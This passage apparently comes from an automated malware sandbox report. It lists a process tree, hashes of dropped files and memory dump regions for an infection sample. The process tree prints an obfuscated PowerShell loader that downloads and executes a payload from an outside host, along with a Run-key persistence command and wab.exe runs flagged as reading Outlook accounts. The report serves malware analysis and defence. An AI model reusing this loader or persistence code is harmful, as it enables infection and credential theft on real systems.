i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
7⤵
PID:596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
8⤵
PID:1184

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
9⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
10⤵
- Adds Run key to start application
- Modifies registry key
PID:3732

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mofxaryqwztfyiqzglpoxnjsseuphdulrb"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4272

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wilhbk"
5⤵
- Accesses Microsoft Outlook accounts
PID:3456

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zlyacculy"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315
Filesize
504B

MD5
caf53bab198edafc0c1e19741633b615

SHA1
7ab640ad45c582add01583f5869b3e9b509614c2

SHA256
7121a51730b1e255f29de62d5b28245a65925745f7801fc94d8ce90f123f7856

SHA512
b549e806180b1ec3293e994cfd784fcc7285723b4eb0df465ee27d777f808236449deeb665495a361a02baf325ee2a2b22386771f536fdb50ca410f728a3d75a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315
Filesize
546B

MD5
7b5e9134cf1be285dc10997b5f5324ae

SHA1
92f3574bac8562510ddd50d74c1a7fa47cdfdd49

SHA256
0ca27d1a4986f80919daf0672b1a520cf0226faa375ee43d3042605f0d54728c

SHA512
42d4197f6c2c2258c06effe0022b7900fc3229b72ad6b9492e53cc22f1a88818e37d3069a192d7bd50a9e1490d80827c9a295d1790f7d26d56853c3ff82407d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
09928e866e2c6e3d427415627c6e4d0a

SHA1
48adcfff11c71e89d7c4d35a1fa6701a9c3f67a2

SHA256
d676aa98db5bde274cf9af268f9648c3241dee0392a8223ef8484b1a4ca4c755

SHA512
bb913ce719f1f7b1af6ff5be187524656ba575a5b1648f7499708e59c228815ffe5bf14e22cbccc31b0be5aaacdfecce1a1ddd2a0707eb41275b4e65b6597c73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d336b18e0e02e045650ac4f24c7ecaa7

SHA1
87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

SHA256
87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

SHA512
e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\Poodle.vbs
Filesize
187KB

MD5
8cc6be5a2911ea3dc1a05c80e20ede55

SHA1
5a68267614fc4f21b949dc82def16adb1a2a7178

SHA256
7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

SHA512
cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42ynop4i.s3s.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mofxaryqwztfyiqzglpoxnjsseuphdulrb
Filesize
4KB

MD5
73ddf6cd83c2ad8a2fbb2383e322ffbc

SHA1
05270f8bb7b5cc6ab9a61ae7453d047379089147

SHA256
0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409

SHA512
714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d

Download Submit
C:\Users\Admin\AppData\Roaming\Unaspiring.Iri
Filesize
516KB

MD5
d4c3c2767329b24e33301e3c3adc6d6a

SHA1
deb9e2babddfef6a845b2897179d61d53cd27dd4

SHA256
d1b95dc6d12a199e88e9d27c7657de5fd0b8821d2b24076fe8e96b95fe24cc46

SHA512
cb9cba8d4351faf2695daf92cbfd9a8fe16c2f6a15b951b000a7a4fa3aaa09c5f106201077917b39b194263d70cb4c4849b739c48225b39eddc01dc28d1b4c64

Download Submit
C:\Users\Admin\AppData\Roaming\belemnoidea.Fos
Filesize
519KB

MD5
9cc29e9c2f524984e4ea412888fad3ab

SHA1
a3d9571861e7f334d70d82eb0c46e10f5427358e

SHA256
6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

SHA512
d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

Download Submit
memory/316-22-0x0000000005DB0000-0x0000000005E16000-memory.dmp

Filesize
408KB

Download
memory/316-33-0x0000000005F00000-0x0000000006254000-memory.dmp

Filesize
3.3MB

Download
memory/316-36-0x0000000007CF0000-0x000000000836A000-memory.dmp

Filesize
6.5MB

Download
memory/316-37-0x0000000006A60000-0x0000000006A7A000-memory.dmp

Filesize
104KB

Download
memory/316-38-0x0000000007790000-0x0000000007826000-memory.dmp

Filesize
600KB

Download
memory/316-39-0x0000000007720000-0x0000000007742000-memory.dmp

Filesize
136KB

Download
memory/316-40-0x0000000008920000-0x0000000008EC4000-memory.dmp

Filesize
5.6MB

Download
memory/316-34-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/316-42-0x0000000008ED0000-0x000000000BFCF000-memory.dmp

Filesize
49.0MB

Download
memory/316-35-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/316-23-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/316-19-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

Filesize
216KB

Download
memory/316-20-0x0000000005690000-0x0000000005CB8000-memory.dmp

Filesize
6.2MB

Download
memory/316-21-0x0000000005620000-0x0000000005642000-memory.dmp

Filesize
136KB

Download
memory/652-127-0x0000000001030000-0x0000000006B75000-memory.dmp

Filesize
91.3MB

Download
memory/652-117-0x0000000001030000-0x0000000006B75000-memory.dmp

Filesize
91.3MB

Download
memory/3140-110-0x0000000008C80000-0x000000000E7C5000-memory.dmp

Filesize
91.3MB

Download
memory/3456-77-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3456-85-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3456-84-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4008-78-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4008-80-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4008-79-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4100-52-0x0000000002290000-0x000000000538F000-memory.dmp

Filesize
49.0MB

Download
memory/4100-95-0x0000000020C10000-0x0000000020C29000-memory.dmp

Filesize
100KB

Download
memory/4100-94-0x0000000020C10000-0x0000000020C29000-memory.dmp

Filesize
100KB

Download
memory/4100-91-0x0000000020C10000-0x0000000020C29000-memory.dmp

Filesize
100KB

Download
memory/4272-74-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4272-73-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4272-76-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4572-75-0x0000000005680000-0x00000000059D4000-memory.dmp

Filesize
3.3MB

Download
memory/4572-87-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

Filesize
304KB

Download
memory/4688-4-0x00007FFF9E173000-0x00007FFF9E175000-memory.dmp

Filesize
8KB

Download
memory/4688-55-0x00007FFF9E170000-0x00007FFF9EC31000-memory.dmp

Filesize
10.8MB

Download
memory/4688-44-0x00007FFF9E173000-0x00007FFF9E175000-memory.dmp

Filesize
8KB

Download
memory/4688-43-0x00007FFF9E170000-0x00007FFF9EC31000-memory.dmp

Filesize
10.8MB

Download
memory/4688-16-0x00007FFF9E170000-0x00007FFF9EC31000-memory.dmp

Filesize
10.8MB

Download
memory/4688-15-0x00007FFF9E170000-0x00007FFF9EC31000-memory.dmp

Filesize
10.8MB

Download
memory/4688-5-0x00000287EF9F0000-0x00000287EFA12000-memory.dmp

Filesize
136KB

Download